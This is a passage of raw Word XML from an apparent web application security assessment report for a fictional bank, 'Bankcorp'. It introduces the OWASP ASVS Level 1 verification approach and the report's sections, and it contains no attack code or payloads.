      <w:r w:rsidR="00EA5040" w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ban</w:t>
      </w:r>
      <w:r w:rsidR="00EA5040">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00EA5040" w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>corp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has suffered crippling attacks on their website</w:t>
      </w:r>
      <w:r w:rsidR="00A06141" w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="003A7D7F" w:rsidRPr="00DF7706">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.insecure-banking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003A7D7F" w:rsidRPr="003A7D7F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003A7D7F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="003A7D7F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A06141" w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Such attacks led to the exposure of some client sensitive data, along with undesired modifications to the front facing website. This attack has also </w:t>
      </w:r>
      <w:r w:rsidR="00F25AA5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>caused</w:t>
      </w:r>
      <w:r w:rsidR="00A06141" w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> clients</w:t>
      </w:r>
      <w:r w:rsidR="00F25AA5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as Liberty beverages Inc</w:t>
      </w:r>
      <w:r w:rsidR="00A06141" w:rsidRPr="00A06141">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to lose faith in the handling of their business transactions. A detailed assessment will include a survey on the web infrastructure ‘s vulnerability and remediated solution to prevent attacks going forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C080623" w14:textId="77777777" w:rsidR="00415780" w:rsidRDefault="00415780" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="IBMBodoniBELight"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE04C19" w14:textId="77777777" w:rsidR="002833D3" w:rsidRDefault="002833D3" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D43DB0" w14:textId="77777777" w:rsidR="002F7D4F" w:rsidRDefault="002F7D4F" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The purpose of this report is to review and assess the web application Target of Verification (TOV) security for the top ten (and beyond) application security risks – and to report assessed vulnerabilities and recommended actions. For purposes of this document, a</w:t>
      </w:r>
      <w:r w:rsidR="005D6713" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pplication review and assessment is also called “verification”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4F6446" w14:textId="77777777" w:rsidR="002F7D4F" w:rsidRDefault="002F7D4F" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C6BB60" w14:textId="77777777" w:rsidR="000C1C85" w:rsidRDefault="009107BE" w:rsidP="000C1C85">
      <w:pPr>
        <w:pStyle w:val="ASVSBodyStyle"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This report is based upon the</w:t>
      </w:r>
      <w:r w:rsidR="000C1C85" w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Application Security Verification Standard (ASVS)</w:t>
      </w:r>
      <w:r w:rsidR="00FF1EC8">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by OWASP, which</w:t>
      </w:r>
      <w:r w:rsidR="000C1C85" w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines four levels of verification that increase in both breadth and depth </w:t>
      </w:r>
      <w:r w:rsidR="00DC1E13">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>at higher levels.</w:t>
      </w:r>
      <w:r w:rsidR="000C1C85" w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The breadth is defined in each level by a set of security requirements that must be addressed. The depth of the verification is defined by the approach and level of rigor required in verifying each security requirement. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F4C15" w14:textId="77777777" w:rsidR="0046632A" w:rsidRDefault="0046632A" w:rsidP="000C1C85">
      <w:pPr>
        <w:pStyle w:val="ASVSBodyStyle"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E6A55D" w14:textId="7818E3AE" w:rsidR="000C1C85" w:rsidRDefault="0046632A" w:rsidP="000C1C85">
      <w:pPr>
        <w:pStyle w:val="ASVSBodyStyle"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AD1A16">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="584ABCC1" wp14:editId="07FFB6EA">
            <wp:extent cx="3840480" cy="260794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0480" cy="2607945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65628B31" w14:textId="77777777" w:rsidR="0046632A" w:rsidRDefault="003775DD" w:rsidP="000C1C85">
      <w:pPr>
        <w:pStyle w:val="ASVSBodyStyle"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Figure One</w:t>
      </w:r>
      <w:r w:rsidR="00DF2191">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – OWASP ASVS Levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082CFAA" w14:textId="77777777" w:rsidR="00DF2191" w:rsidRDefault="00DF2191" w:rsidP="000C1C85">
      <w:pPr>
        <w:pStyle w:val="ASVSBodyStyle"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056576B7" w14:textId="4C80E1F7" w:rsidR="000C1C85" w:rsidRPr="000C1C85" w:rsidRDefault="000C1C85" w:rsidP="000C1C85">
      <w:pPr>
        <w:pStyle w:val="ASVSBodyStyle"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This report focuses on </w:t>
      </w:r>
      <w:r w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Level 1 (“Automated Verification”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, which</w:t>
      </w:r>
      <w:r w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically appropriate for applications where some confidence in the correct use of security controls is required. Threats to security will typically be viruses and worms (targets are chosen indiscriminately through wide scans and impact the most vulnerable). The scope of verification includes code that was developed or modified </w:t>
      </w:r>
      <w:r w:rsidR="003A7D7F" w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> create the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208808AC" w14:textId="77777777" w:rsidR="000C1C85" w:rsidRDefault="000C1C85" w:rsidP="000C1C85">
      <w:pPr>
        <w:pStyle w:val="ASVSBodyStyle"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC17F2F" w14:textId="77777777" w:rsidR="000C1C85" w:rsidRPr="000C1C85" w:rsidRDefault="000C1C85" w:rsidP="000C1C85">
      <w:pPr>
        <w:pStyle w:val="ASVSBodyStyle"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C1C85">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In Level 1, the verification involves the use of automated tools augmented with manual verification. This level only provides partial application security verification coverage. The manual verification is not intended to make the application security verification performed at this level complete, only to verify that each automated finding is correct and not a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2338F99B" w14:textId="77777777" w:rsidR="009107BE" w:rsidRPr="000C1C85" w:rsidRDefault="009107BE" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCC6661" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00F74A6A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report contains the following</w:t>
      </w:r>
      <w:r w:rsidR="005D6713" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>additional sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B80847C" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C675C72" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Section 2: The Target of Verification (TOV)</w:t>
      </w:r>
      <w:r w:rsidR="005D6713" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description. This section describes the TOV</w:t>
      </w:r>
      <w:r w:rsidR="005D6713" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>implementation.</w:t>
      </w:r>
      <w:r w:rsidR="007F0798">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this context, it is the web application itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44523B42" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B83582" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Section 3: Assumptions. This section describes the assumptions made during verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E99099" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455D054A" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Section 4: Verification Requirements. This section identifies the OWASP ASVS verification requirements that the ver</w:t>
      </w:r>
      <w:r w:rsidR="007F0798">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ification was performed against- as well as other web server requirements that are best practices that are not specifically enumerated in the ASVS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA0BB35" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="0052181F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3A9321" w14:textId="77777777" w:rsidR="0052181F" w:rsidRPr="0060698B" w:rsidRDefault="0052181F" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 5: </w:t>
      </w:r>
      <w:r w:rsidR="005D6713" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verification Approach</w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This section </w:t>
      </w:r>
      <w:r w:rsidR="0036519D" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>identifies</w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the verification methodology that was used to determine if ASVS verification requirements were met or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2B3FA4" w14:textId="77777777" w:rsidR="005D6713" w:rsidRPr="0060698B" w:rsidRDefault="005D6713" w:rsidP="005D6713">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35354A93" w14:textId="77777777" w:rsidR="000E7769" w:rsidRPr="0060698B" w:rsidRDefault="001F3440" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Appendices A</w:t>
      </w:r>
      <w:r w:rsidR="000E7769" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r w:rsidR="000E7769" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007F0798">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C, and D</w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="000E7769" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verification</w:t>
      </w:r>
      <w:r w:rsidR="0052181F" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E7769" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:r w:rsidR="0052181F" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005D6713" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">These appendices </w:t>
      </w:r>
      <w:r w:rsidR="00BA1C7A" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>summarize</w:t>
      </w:r>
      <w:r w:rsidR="0052181F" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the results of </w:t>
      </w:r>
      <w:r w:rsidR="000E7769" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>verification activities that were performed. The complete set of a</w:t>
      </w:r>
      <w:r w:rsidR="007F0798">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rchitecture-related findings is</w:t>
      </w:r>
      <w:r w:rsidR="000E7769" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided in Appendix A, while summaries of results using tools are provided in Appendices B</w:t>
      </w:r>
      <w:r w:rsidR="007F0798">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, C, and D</w:t>
      </w:r>
      <w:r w:rsidR="000E7769" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587AB4A1" w14:textId="77777777" w:rsidR="00BA1C7A" w:rsidRPr="0060698B" w:rsidRDefault="00BA1C7A" w:rsidP="00BA1C7A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76706C69" w14:textId="77777777" w:rsidR="0060698B" w:rsidRPr="007D3687" w:rsidRDefault="00BA1C7A" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="007F0798">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – OWASP ASVS Pass/Fail verdicts. This appendix documents </w:t>
      </w:r>
      <w:r w:rsidR="0052181F" w:rsidRPr="0060698B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pass/fail verdicts for OWASP ASVS verification requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FBF5E0" w14:textId="0958E77D" w:rsidR="00C14ABF" w:rsidRDefault="00C14ABF" w:rsidP="00C14ABF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc46402702"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="32B55D5F" w14:textId="72CBD51F" w:rsidR="004D627B" w:rsidRDefault="004D627B" w:rsidP="004D627B"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1988773805"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="139964D0" w14:textId="63320155" w:rsidR="00D7688E" w:rsidRDefault="00D7688E">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r>
            <w:t>References</w:t>
          </w:r>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Times New Roman" w:hAnsi="Book Antiqua"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:p w14:paraId="055F3534" w14:textId="77777777" w:rsidR="004573F1" w:rsidRDefault="00D7688E" w:rsidP="004573F1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                  <w:szCs w:val="24"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
